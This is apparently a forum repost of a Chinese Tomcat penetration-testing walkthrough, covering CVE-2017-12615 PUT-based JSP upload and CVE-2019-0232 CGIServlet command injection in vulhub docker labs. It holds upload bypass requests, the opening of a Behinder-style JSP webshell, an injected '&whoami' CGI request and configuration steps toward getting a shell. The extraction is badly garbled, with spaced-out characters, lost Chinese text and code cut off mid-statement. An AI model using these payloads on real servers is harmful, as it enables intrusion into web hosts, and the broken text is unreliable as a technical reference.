[17073] 2021-07-26_渗透测试Tomcat渗透

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-26_渗透测试Tomcat渗透   |   T o m c a t     F r e e B u f   2 0 2 1 - 0 7 - 2 6 T o m c a t w e b 访 使 J S P   A p a c h e H T M L 访   T o m c a t   A p a c h e   t o m c a t A p a c h e 7 - 1 0 8 0 8 0 j a v a T o m c a t J A V A J S P   S e r v l e t T o m c a t 8 J a v a 7 J D K T o m c a t T o m c a t     o k 8 0 8 0  
访 T o m c a t 1 . s e r v e r . x m l   t o m c a t h o s t C o n t e x t 2 . w e b . x m l : w e b . x m l   s e r v l e t   w e b a p p w e b   s e r v l e t   3 t o m c a t - u s e r s . x m l : t o m c a t
T o m c a t T o m c a t ( C V E - 2 0 1 7 - 1 2 6 1 5 A p a c h e   T o m c a t 7 . 0 . 0 - 7 . 0 . 8 1 v u l h u b   f a l s e 使 P U T j s p   P U T   j s p s u d o   s e r v i c e   d o c k e r   s t a r t   c d   v u l h u b / t o m c a t / C V E - 2 0 1 7 - 1 2 6 1 5 s u d o   d o c k e r - c o m p o s e   b u i l d s u d o   d o c k e r - c o m p o s e   u p   - d s u d o   d o c k e r   p s s u d o   d o c k e r   e x e c   - t i   a 3   b a s h c a t   c o n f / w e b . x m l   | g r e p   r e a d o n l y c o n f / w e b . x m l r e a d o n l y / u s r / l o c a l / t o m c a t / w e b a p p s / R O O T
a 0 0 1 . j s p   s e r v e r j s p j s p , j s p 1 . W i n d o w s P U T   / a 0 0 1 . j s p % 2 0   H T T P / 1 . 1   W i n d o w s 2 . W i n d o w s N T F S P u t / a 0 0 1 . j s p : : $ D A T A   H T T P / 1 . 1 3 .   / L i n u x / W i n d o w s P u t / a 0 0 1 . j s p / h t t p : / 1 . 1 < % @ p a g e   i m p o r t = " j a v a . u t i l . * , j a v a x . c r y p t o . * , j a v a x . c r y p t o . s p e c . * " % > < % ! c l a s s   U   e x t e n d s   C l a s s L o a d e r { U ( C l a s s L o a d e r   c ) { s u p e r ( c ) ; } p u b l i c   C l a s s   g ( b y t e   [ ] b ) { r e t u r n   s u p e r . d e f i n e C l a s s ( b , / * 3 2 m d 5 1 6 r e b e y o n d * / /
    P U T   t x t 退   T o m c a t < i n i t - p a r a m >   < p a r a m - n a m e > r e a d o n l y < / p a r a m - n a m e >   < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e > < / i n i t - p a r a m >
P U T t x t   j s p     r e a d o n l y   t r u e T o m c a t C V E - 2 0 1 9 - 0 2 3 2   W i n d o w s   8 . 5 . 3 9   j a v a T o m c a t < i n i t - p a r a m >   < p a r a m - n a m e > r e a d o n l y < / p a r a m - n a m e >   < p a r a m - v a l u e > f a l s e < / p a r a m - v a l u e > < / i n i t - p a r a m > A p a c h e   T o m c a t   9 . 0 . 0 . M 1   t o   9 . 0 . 1 7 A p a c h e   T o m c a t   8 . 5 . 0   t o   8 . 5 . 3 9 A p a c h e   T o m c a t   7 . 0 . 0   t o   7 . 0 . 9 3
访 C G I S e r l v e t U r l J a v a   W i n d o w s   L i n u x J a v a R u n t i m e . g e t R u n t i m e ( ) . e x e c C G I   W i n d o w s 使   C r e a t e P r o c e s s   C r e a t e P r o c e s s a r g v   W i n d o w s b a t c m d   c m d . e x e J a v a W i n d o w s W i n d o w s   L i n u x W i n d o w s   W i n d o w s J a v a c m d T o m c a t   C G I _ S e r v l e t   C G I S e r v l e t   e n a b l e C m d L i n e A r g u m e n t s e x e c u t a b l e t o m c a t j a v a o r g a p a c h e c a t a l i n a s e r v l e t s C G I S e r v l e t . j a v a c g i e n a b l e C m d L i n e A r g u m e n t s R F C   3 8 7 5 R u n t i m e R u n t i m e . g e t R u n t i m e ( ) . e x e c l p C o m a n d L i n e G e t c o m m a n d L i n e C o m m a n d L i n e T o A r g w C r e a t e P r o c e s s c m d . e x e   / c   " a 0 0 1 . b a t   d i r " d i r   " " & w h o a m i " " " " c o n f / w e b . x m l
e n a b l e C m d L i n e A r g u m e n t s   e x e c u t a b l e 1 . e n a b l e C m d L i n e A r g u m e n t s U r l 2 . e x e c u t a b l e p e r l c o n f / w e b . x m l c g i   s e r v l e t - m a p p i n g c o n f / c o n t e x t . x m l   p r i v i l e g e d = t r u e a 0 0 1 . t x t < s e r v l e t >         < s e r v l e t - n a m e > c g i < / s e r v l e t - n a m e >         < s e r v l e t - c l a s s > o r g . a p a c h e . c a t a l i n a . s e r v l e t s . C G I S e r v l e t < / s e r v l e t - c l a s s >         < i n i t - p a r a m >                 < p a r a m - n a m e > c g i P a t h P r e f i x < / p a r a m - n a m e >                 < p a r a m - v a l u e > W E B - I N F / c g i < / p a r a m - v a l u e >         < / i n i t - p a r a m >         < i n i t - p a r a m >                 < p a r a m - n a m e > e n a b l e C m d L i n e A r g u m e n t s < / p a r a m - n a m e >                 < p a r a m - v a l u e > t r u e < / p a r a m - v a l u e >         < / i n i t - p a r a m >         < i n i t - p a r a m >                 < p a r a m - n a m e > e x e c u t a b l e < / p a r a m - n a m e >                 < p a r a m - v a l u e > < / p a r a m - v a l u e >         < / i n i t - p a r a m >         < l o a d - o n - s t a r t u p > 5 < / l o a d - o n - s t a r t u p > < / s e r v l e t > < C o n t e x t   p r i v i l e g e d = " t r u e " > C : T o m c a t w e b a p p s R O O T W E B - I N F c g i - b i n
访   p a t c h   s e t u p F r o m R e q u e s t   C G I E n v i r o n m e n t   f a l s e h t t p : / / 1 9 2 . 1 6 8 . 1 7 5 . 1 9 3 : 8 0 8 0 / c g i - b i n / a 0 0 1 . b a t ? & d i r c m d L i n e A r g u m e n t s D e c o d e d S t r i n g   d e c o d e d A r g u m e n t   =   U R L D e c o d e r . d e c o d e ( e n c o d e d A r g u m e n t ,   p a r a m e t e r E n c o d i n g ) ; i f   ( c m d L i n e A r g u m e n t s D e c o d e d P a t t e r n   ! =   n u l l   & &   ! c m d L i n e A r g u m e n t s D e c o d e d P a t t e r n . m a t c h e r ( d e c o d e d A r g u m e n t ) . m a t c h e s ( ) )   {   i f   ( l o g . i s D e b u g E n a b l e d ( ) )   {   l o g . d e b u g ( s m . g e t S t r i n g ( " c g i S e r v l e t . i n v a l i d A r g u m e n t D e c o d e d " ,   d e c o d e d A r g u m e n t ,   c m d L i n e A r g u m e n t s D e c o d e d P a t t e r n . t o S t r i n g ( ) ) ) ;   }   r e t u r n   f a l s e ; } v a l i d i f   ( c g i E n v . i s V a l i d ( ) )   {   C G I R u n n e r   c g i   =   n e w   C G I R u n n e r ( c g i E n v . g e t C o m m a n d ( ) ,   c g i E n v . g e t E n v i r o n m e n t ( ) ,   c g i E n v . g e t W o r k i n g D i r e c t o r y ( ) ,   c g i E n v . g e t P a r a m e t e r s ( ) ) ;
1 . 使   A p a c h e   T o m c a t 9 . 0 . 1 8 9 . 0 . 1 8 9 . 0 . 1 9 2 .   e n a b l e C m d L i n e A r g u m e n t s T o m c a t & g e t s h e l l T o m c a t 8 v u l h u b d o c k e r   i f   ( " P O S T " . e q u a l s ( r e q . g e t M e t h o d ( ) ) )   {   c g i . s e t I n p u t ( r e q . g e t I n p u t S t r e a m ( ) ) ;   }   c g i . s e t R e s p o n s e ( r e s ) ;   c g i . r u n ( ) ; }   e l s e   {   r e s . s e n d E r r o r ( 4 0 4 ) ; } c d   v u l h u b - m a s t e r / t o m c a t / t o m c a t 8 s u d o   d o c k e r - c o m p o s e   u p   - d s u d o   d o c k e r   p s s u d o   d o c k e r   e x e c   - t i   a   b a s h c d   c o n f s u d o   d o c k e r   c p   5 e 8 1 d 6 d 5 1 6 2 2 : / u s r / l o c a l / t o m c a t / c o n f / t o m c a t - u s e r s . x m l   / h o m e / d a y u / D e s k t o p / s u d o   d o c k e r   c p   5 e 8 1 d 6 d 5 1 6 2 2 : / u s r / l o c a l / t o m c a t / c o n f / t o m c a t - u s e r s . x s d   / h o m e / d a y u / D e s k t o p / s u d o   d o c k e r   c p   5 e 8 1 d 6 d 5 1 6 2 2 : / u s r / l o c a l / t o m c a t / c o n f / w e b . x m l   / h o m e / d a y u / D e s k t o p / < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < t o m c a t - u s e r s   x m l n s = " h t t p : / / t o m c a t . a p a c h e . o r g / x m l "   x m l n s : x s i = " h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / X M L S c h e m a - i n s t a n c e "   x s i : s c h e m a L o c a t i o n = " h t t p : / / t o m c a t . a p a c h e . o r g / x m l   t o m c a t - u s e r s . x s d "   v e r s i o n = " 1 . 0 " >   < r o l e   r o l e n a m e = " m a n a g e r - g u i " / >   < r o l e   r o l e n a m e = " m a n a g e r - s c r i p t " / >   < r o l e   r o l e n a m e = " m a n a g e r - j m x " / >   < r o l e   r o l e n a m e = " m a n a g e r - s t a t u s " / >   < r o l e   r o l e n a m e = " a d m i n - g u i " / >   < r o l e   r o l e n a m e = " a d m i n - s c r i p t " / >
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则